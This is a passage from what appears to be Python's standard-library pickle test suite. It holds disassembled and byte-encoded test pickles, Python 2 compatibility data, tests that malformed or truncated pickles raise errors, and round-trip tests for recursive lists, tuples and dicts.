19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
    # StandardError is gone in Python 3; we map it to Exception.
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
        # Also try with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(pickle.UnpicklingError, b'g0\np0')
self.check_unpickling_error(pickle.UnpicklingError, b'jens:')
self.check_unpickling_error(pickle.UnpicklingError, b'hens:')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_reduce(self):
self.assertEqual(self.loads(b'cbuiltins\nint\n)R.'), 0)
self.check_unpickling_error(TypeError, b'N)R.')
self.check_unpickling_error(TypeError, b'cbuiltins\nint\nNR.')
def test_bad_newobj(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)\x81.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)\x81.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN\x81.')
def test_bad_newobj_ex(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)}\x92.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\n)N\x92.')
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
            # This ensures the threads have all started;
            # presumably barrier release is faster than thread startup.
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
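# Unpickling a GLOBAL/STACK_GLOBAL opcode imports the referenced module on
# demand, which is why test_unpickle_module_race above needs an import
# barrier.  A minimal sketch (not used by the tests) of that lazy import,
# using a hand-written payload that references json.loads:
def _global_opcode_import_sketch():
    payload = b'\x80\x03cjson\nloads\nq\x00.'   # GLOBAL 'json loads'
    func = pickle.loads(payload)                # imports json if necessary
    import json
    assert func is json.loads
    return func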
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def _test_recursive_list(self, cls, aslist=identity, minprotocol=0):
# List containing itself.
l = cls()
l.append(l)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
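    # A self-contained sketch (not a test) of the invariant exercised by
    # _test_recursive_list above: a self-referential list survives a round
    # trip with its cycle intact, courtesy of the unpickler's memo.
    def _recursive_list_roundtrip_sketch(self):
        l = []
        l.append(l)                        # l[0] is l
        copy = pickle.loads(pickle.dumps(l))
        assert copy[0] is copy             # the cycle is reconstructed
        return copy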
def test_recursive_list(self):
self._test_recursive_list(list)
def test_recursive_list_subclass(self):
self._test_recursive_list(MyList, minprotocol=2)
def test_recursive_list_like(self):
self._test_recursive_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_tuple_and_list(self, cls, aslist=identity, minprotocol=0):
# Tuple containing a list containing the original tuple.
t = (cls(),)
t[0].append(t)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = aslist(x[0])
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
# List containing a tuple containing the original list.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(y[0], tuple)
self.assertEqual(len(y[0]), 1)
self.assertIs(y[0][0], x)
def test_recursive_tuple_and_list(self):
self._test_recursive_tuple_and_list(list)
def test_recursive_tuple_and_list_subclass(self):
self._test_recursive_tuple_and_list(MyList, minprotocol=2)
def test_recursive_tuple_and_list_like(self):
self._test_recursive_tuple_and_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_dict(self, cls, asdict=identity, minprotocol=0):
# Dict containing itself.
d = cls()
d[1] = d
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y.keys()), [1])
self.assertIs(y[1], x)
def test_recursive_dict(self):
self._test_recursive_dict(dict)
def test_recursive_dict_subclass(self):
self._test_recursive_dict(MyDict, minprotocol=2)
def test_recursive_dict_like(self):
self._test_recursive_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing the original tuple.
t = (cls(),)
t[0][1] = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(list(y), [1])
self.assertIs(y[1], x)
# Dict containing a tuple containing the original dict.
t, = t
